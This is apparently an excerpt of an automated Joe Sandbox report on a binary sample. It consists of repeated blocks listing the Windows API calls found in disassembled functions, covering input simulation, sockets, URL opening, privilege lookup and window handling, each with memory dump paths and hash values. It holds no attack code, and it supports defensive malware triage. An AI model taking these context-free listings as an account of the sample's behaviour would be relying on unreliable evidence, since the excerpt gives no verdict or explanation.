                                                                      • Instruction ID: 444e691aa9a21eae7b15cbac171cf9fa530e67bb7dfc028056e3042253d70d57
                                                                      • Opcode Fuzzy Hash: 035e6db40586c1b04eb658ae6695d2447a8bdee217e5072e9c4e48a46cbf4eb5
                                                                      • Instruction Fuzzy Hash: EC518274704302DADF24AFA5D8A5A6ABBE5BF85310F20DC1FE596DB291DE74E880C701
                                                                      APIs
                                                                      • GetWindowRect.USER32(0100D820,?), ref: 00599863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00599896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599903
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: ad796aaa41477165f8dca726498ea24d1a111b6a13673383c130bbc2583b45dd
                                                                      • Instruction ID: 7559ac1a8653c5ec6bc607a469e8f03b9b9d0186d9aaa6001a8a3cee2b6508dc
                                                                      • Opcode Fuzzy Hash: ad796aaa41477165f8dca726498ea24d1a111b6a13673383c130bbc2583b45dd
                                                                      • Instruction Fuzzy Hash: 06514F34A01209EFDF20CF68D984AAE7BB5FF55360F24815EF9559B2A0D730AD81DB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00569AD2
                                                                      • __itow.LIBCMT ref: 00569B03
                                                                        • Part of subcall function 00569D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00569DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00569B6C
                                                                      • __itow.LIBCMT ref: 00569BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: c348ea97c0f7e9a107d30a2e4a4c6a58796c89baa02ee1caef3a7fca1cd4ccde
                                                                      • Instruction ID: 206d9b50559fe85f9b0195d5112d53ec6294114c7f5bb768d1a323447c4d4439
                                                                      • Opcode Fuzzy Hash: c348ea97c0f7e9a107d30a2e4a4c6a58796c89baa02ee1caef3a7fca1cd4ccde
                                                                      • Instruction Fuzzy Hash: 52414F74A0420DABDF11DF54D849BEE7FB9FF88714F000069F905A72A1DB749984CB91
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 005869D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005869E1
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00586A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 07d8a50b056f28e55cb1ca1e3c47014ccbab03431b6f7abfc54f577cbef7d165
                                                                      • Instruction ID: 0c8550b6cd3c89014c5bf9373784a6087e7f0f89b4f0eb810790fff96f4ae314
                                                                      • Opcode Fuzzy Hash: 07d8a50b056f28e55cb1ca1e3c47014ccbab03431b6f7abfc54f577cbef7d165
                                                                      • Instruction Fuzzy Hash: C1419275640201AFEB60BF24DC9AFB97BA4AF54B14F448418FA19AF3C2DA709D418791
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0059F910), ref: 005864A7
                                                                      • _strlen.LIBCMT ref: 005864D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: 39ec7972ffb0f51e9678b51186f956c1d60c8aad34a11e6c170270b7ecaa587c
                                                                      • Instruction ID: 1f13fbfdb651201bebf54fa7c7b789f1cc3969c30740fb1e0b8a763c3ca86d3f
                                                                      • Opcode Fuzzy Hash: 39ec7972ffb0f51e9678b51186f956c1d60c8aad34a11e6c170270b7ecaa587c
                                                                      • Instruction Fuzzy Hash: D5419631A04105ABDB14FB64DC99EEEBFA9BF94310F548155FC15A7292EB30EE44C750
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0057B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0057B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0057B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0057B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: a9e814ad540dbed0576d33ea6474f594c19ebcbce0d0b92c9edab3a2ca8f7812
                                                                      • Instruction ID: e76d40fff7a84699f2e4355f892d5043298a38df215d0edc54cd64684a5d590c
                                                                      • Opcode Fuzzy Hash: a9e814ad540dbed0576d33ea6474f594c19ebcbce0d0b92c9edab3a2ca8f7812
                                                                      • Instruction Fuzzy Hash: B3411939600511EFDB10EF15C498A99BBE1BF8A310F19C099ED4A9B362CB30FD41DB91
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005988DE
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 0059AB60
• GetWindowRect.USER32(?,?), ref: 0059ABD6
• PtInRect.USER32(?,?,0059C014), ref: 0059ABE6
• MessageBeep.USER32(00000000), ref: 0059AC57
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00570B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00570B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00570BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00570BFB
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00570C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00570C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00570CE1
• SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00570D33
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005461FB
• __isleadbyte_l.LIBCMT ref: 00546229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00546257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0054628D
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• GetForegroundWindow.USER32 ref: 00594F02
  • Part of subcall function 00573641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0057365B
  • Part of subcall function 00573641: GetCurrentThreadId.KERNEL32 ref: 00573662
  • Part of subcall function 00573641: AttachThreadInput.USER32(00000000,?,00575005), ref: 00573669
• GetCaretPos.USER32(?), ref: 00594F13
• ClientToScreen.USER32(00000000,?), ref: 00594F4E
• GetForegroundWindow.USER32 ref: 00594F54
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
• GetCursorPos.USER32(?), ref: 0059C4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054B9AB,?,?,?,?,?), ref: 0059C4E7
• GetCursorPos.USER32(?), ref: 0059C534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054B9AB,?,?,?), ref: 0059C56E
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
APIs
  • Part of subcall function 0056810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568121
  • Part of subcall function 0056810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0056812B
  • Part of subcall function 0056810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0056813A
  • Part of subcall function 0056810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568141
  • Part of subcall function 0056810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005686A3
• _memcmp.LIBCMT ref: 005686C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 005686FC
• HeapFree.KERNEL32(00000000), ref: 00568703
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 1592001646-0
APIs
• __setmode.LIBCMT ref: 005309AE
  • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
  • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
• _fprintf.LIBCMT ref: 005309E5
• OutputDebugStringW.KERNEL32(?), ref: 00565DBB
  • Part of subcall function 00534AAA: _flsall.LIBCMT ref: 00534AC3
• __setmode.LIBCMT ref: 00530A1A
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005817A3
  • Part of subcall function 0058182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058184C
  • Part of subcall function 0058182D: InternetCloseHandle.WININET(00000000), ref: 005818E9
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
APIs
• GetFileAttributesW.KERNEL32(?,0059FAC0), ref: 00573A64
• GetLastError.KERNEL32 ref: 00573A73
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00573A82
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0059FAC0), ref: 00573ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: f7aecbeb7225a03917e742e70e0d8a4878af8655b520073b538a8144b9716326
                                                                      • Instruction ID: db13650c15204292027994d8870d51ad711c71b96a5135b5ad958561b576107e
                                                                      • Opcode Fuzzy Hash: f7aecbeb7225a03917e742e70e0d8a4878af8655b520073b538a8144b9716326
                                                                      • Instruction Fuzzy Hash: 972176745082069F8710DF28D8468AA7FE4BE55374F148A19F49DC7291D731DE49EB42
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00545101
                                                                        • Part of subcall function 0053571C: __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053571C: __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053571C: RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 16495cd2156eebe805be546a400c9ba0dfaaab88326d9574d24783560df649eb
                                                                      • Instruction ID: 64442be135d363e41e7073c1b6b0b5d0563ac0a432293d81b0308b64a003c306
                                                                      • Opcode Fuzzy Hash: 16495cd2156eebe805be546a400c9ba0dfaaab88326d9574d24783560df649eb
                                                                      • Instruction Fuzzy Hash: 97110672900B17AFCB312F70AC49BAD3F98BF543A5F205D2AF98596152EF348940D790
                                                                      APIs
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00586399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005863A4
                                                                      • _memmove.LIBCMT ref: 005863D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 005863DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      • Opcode ID: 832ae764ac33ed0ea1a2c2507b5ffcc75f7541d6775960634a431f969b0fb13e
                                                                      • Instruction ID: 1dc5ef6cde4ebe63c0e673da8a3dee1696a621cdd506f4bc4e9c95b3bf7024da
                                                                      • Opcode Fuzzy Hash: 832ae764ac33ed0ea1a2c2507b5ffcc75f7541d6775960634a431f969b0fb13e
                                                                      • Instruction Fuzzy Hash: 8811513150010AEFCB00FBA4DD9ACEE7BB8BF98310B144065F505B7161EB309E54DB61
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00568B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 05eb4a4d0ef932a58bb7f2125ddb67ba579ffebcdd5466102c80f58ee83a3302
                                                                      • Instruction ID: 897d47e48d62975a413a4863032529e071e435cc6f595e17467780cf4503d76e
                                                                      • Opcode Fuzzy Hash: 05eb4a4d0ef932a58bb7f2125ddb67ba579ffebcdd5466102c80f58ee83a3302
                                                                      • Instruction Fuzzy Hash: B2111C79901218FFDB11DF95CC85FADBB74FB48710F204195E904B7250DA716E11DB94
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 005112D8
                                                                      • GetClientRect.USER32(?,?), ref: 0054B5FB
                                                                      • GetCursorPos.USER32(?), ref: 0054B605
                                                                      • ScreenToClient.USER32(?,?), ref: 0054B610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: 4a009659b7da74352e13c607e026e3961b1b231d378d92b229deae25932d31ee
                                                                      • Instruction ID: 9ef9438dbf9ab5d6ef0a162b376d8f4524b6344c62bf057a0ff5f7a984167607
                                                                      • Opcode Fuzzy Hash: 4a009659b7da74352e13c607e026e3961b1b231d378d92b229deae25932d31ee
                                                                      • Instruction Fuzzy Hash: A311BF3950041AEFDF10DF99C8899FE7BB8FB45301F100892FA11E3140C730BA959BA9
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0056D84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0056D864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0056D879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0056D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 9a302e5f26794f3fdb1b82a63d2cf8a07ef9f9a1bec9f41fbb68a7459325ebbb
                                                                      • Instruction ID: 0403100cd09a35bc8c46586a58ebec7693f8878a36825bd9bc6c7c00d0e66123
                                                                      • Opcode Fuzzy Hash: 9a302e5f26794f3fdb1b82a63d2cf8a07ef9f9a1bec9f41fbb68a7459325ebbb
                                                                      • Instruction Fuzzy Hash: 55115E75B05304DBE7208F50DC0CF92BBBCFB00B00F10896AA516D7050D7B0E959ABB1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction ID: 460b687e610ecac83749b8def9003f508776496dfd98a9af27f6c20a3ddcdeeb
                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction Fuzzy Hash: 6A014B7244914EBBCF265E84DC09CEE3F62BB1C358B598415FA5858031D336D9B1AF81
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 0059B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 0059B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 0059B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B33B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: c662d5ce3b0599ec2f0667f7243b8cad8b557d634cd808c5095faa2454f096d1
                                                                      • Instruction ID: e9904db689d1dcf3b6609048cd9a7466c97521447dfa140ef741f896f3077529
                                                                      • Opcode Fuzzy Hash: c662d5ce3b0599ec2f0667f7243b8cad8b557d634cd808c5095faa2454f096d1
                                                                      • Instruction Fuzzy Hash: DF1143B9D00209EFDB41CFA9D9849EEBBB9FB18310F108166E914E3220D735AA659F51
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00576BE6
                                                                        • Part of subcall function 005776C4: _memset.LIBCMT ref: 005776F9
                                                                      • _memmove.LIBCMT ref: 00576C09
                                                                      • _memset.LIBCMT ref: 00576C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00576C26
                                                                      Memory Dump Source
